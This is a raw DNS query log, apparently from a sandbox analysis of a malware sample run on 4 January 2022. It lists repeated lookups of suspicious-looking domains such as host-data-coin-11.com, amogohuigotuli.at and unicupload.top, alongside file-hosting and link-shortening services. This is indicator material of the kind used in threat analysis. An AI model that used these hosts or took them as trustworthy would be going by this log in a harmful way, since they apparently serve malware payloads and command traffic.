                                                                                                                                                                                                        Jan 4, 2022 19:33:01.433686972 CET8.8.8.8192.168.2.50x4d1bNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:01.618597984 CET8.8.8.8192.168.2.50x2fd5No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:03.967916012 CET8.8.8.8192.168.2.50x976cNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.256407022 CET8.8.8.8192.168.2.50x31e8No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.689863920 CET8.8.8.8192.168.2.50xc580No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.959872007 CET8.8.8.8192.168.2.50x41f1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.959872007 CET8.8.8.8192.168.2.50x41f1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.959872007 CET8.8.8.8192.168.2.50x41f1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.959872007 CET8.8.8.8192.168.2.50x41f1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.959872007 CET8.8.8.8192.168.2.50x41f1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:06.735904932 CET8.8.8.8192.168.2.50x90adNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:06.956106901 CET8.8.8.8192.168.2.50x7076No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:07.180413961 CET8.8.8.8192.168.2.50x9148No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:22.009233952 CET8.8.8.8192.168.2.50x5f1aNo error (0)patmushta.info194.87.235.183A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.024240017 CET8.8.8.8192.168.2.50xc31bServer failure (2)srtuiyhuali.atnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.468234062 CET8.8.8.8192.168.2.50x677aNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.667419910 CET8.8.8.8192.168.2.50xeac7No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.881932974 CET8.8.8.8192.168.2.50xaf9dNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:29.113784075 CET8.8.8.8192.168.2.50x391eNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:29.335551977 CET8.8.8.8192.168.2.50x269dNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.120434046 CET8.8.8.8192.168.2.50xc397No error (0)unic11m.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.146827936 CET8.8.8.8192.168.2.50xaf8dNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.357781887 CET8.8.8.8192.168.2.50x10d6No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.439455032 CET8.8.8.8192.168.2.50xffceNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.577033997 CET8.8.8.8192.168.2.50xc629No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.772905111 CET8.8.8.8192.168.2.50x5b0cNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.024795055 CET8.8.8.8192.168.2.50x8a73No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.226968050 CET8.8.8.8192.168.2.50x5e72No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.226968050 CET8.8.8.8192.168.2.50x5e72No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.423835993 CET8.8.8.8192.168.2.50x4282No error (0)bitly.com67.199.248.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.423835993 CET8.8.8.8192.168.2.50x4282No error (0)bitly.com67.199.248.14A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.630799055 CET8.8.8.8192.168.2.50x3f02No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.820178032 CET8.8.8.8192.168.2.50x95fdNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:36.348193884 CET8.8.8.8192.168.2.50x1073No error (0)data-host-coin-8.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:39.769187927 CET8.8.8.8192.168.2.50x701eNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.029031992 CET8.8.8.8192.168.2.50x2760No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.223347902 CET8.8.8.8192.168.2.50xa59cNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.438524961 CET8.8.8.8192.168.2.50x9126No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.438524961 CET8.8.8.8192.168.2.50x9126No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.650187969 CET8.8.8.8192.168.2.50x5442No error (0)www.mediafire.com104.16.203.237A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.650187969 CET8.8.8.8192.168.2.50x5442No error (0)www.mediafire.com104.16.202.237A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.363959074 CET8.8.8.8192.168.2.50x6e9fNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.579073906 CET8.8.8.8192.168.2.50x6967No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.579073906 CET8.8.8.8192.168.2.50x6967No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.771428108 CET8.8.8.8192.168.2.50xecbbNo error (0)www.mediafire.com104.16.203.237A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.771428108 CET8.8.8.8192.168.2.50xecbbNo error (0)www.mediafire.com104.16.202.237A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.485076904 CET8.8.8.8192.168.2.50x8583No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.689954042 CET8.8.8.8192.168.2.50xdb32No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.895642042 CET8.8.8.8192.168.2.50xda5bNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.105460882 CET8.8.8.8192.168.2.50xace2No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.105460882 CET8.8.8.8192.168.2.50xace2No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.549119949 CET8.8.8.8192.168.2.50xe291No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.774574041 CET8.8.8.8192.168.2.50xbe44No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.963344097 CET8.8.8.8192.168.2.50x50d2No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:44.144305944 CET8.8.8.8192.168.2.50xfbffNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:44.378165007 CET8.8.8.8192.168.2.50xb809No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.598094940 CET8.8.8.8192.168.2.50xfe7dNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917447090 CET8.8.8.8192.168.2.50xbcb0No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.917687893 CET8.8.8.8192.168.2.50x75bdNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.173059940 CET8.8.8.8192.168.2.50xe695No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.355176926 CET8.8.8.8192.168.2.50xe22No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.546367884 CET8.8.8.8192.168.2.50xf446No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.801156044 CET8.8.8.8192.168.2.50xe2bcNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:49.633609056 CET8.8.8.8192.168.2.50xf5c2No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:50.536936998 CET8.8.8.8192.168.2.50x229bNo error (0)f0616068.xsph.ru141.8.193.236A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.859932899 CET8.8.8.8192.168.2.50x552eNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.861382008 CET8.8.8.8192.168.2.50x20b7No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.048371077 CET8.8.8.8192.168.2.50x7863No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.254973888 CET8.8.8.8192.168.2.50x5562No error (0)vk.com87.240.190.72A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.254973888 CET8.8.8.8192.168.2.50x5562No error (0)vk.com87.240.190.78A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.254973888 CET8.8.8.8192.168.2.50x5562No error (0)vk.com93.186.225.208A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.254973888 CET8.8.8.8192.168.2.50x5562No error (0)vk.com87.240.139.194A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.254973888 CET8.8.8.8192.168.2.50x5562No error (0)vk.com87.240.137.158A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.254973888 CET8.8.8.8192.168.2.50x5562No error (0)vk.com87.240.190.67A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
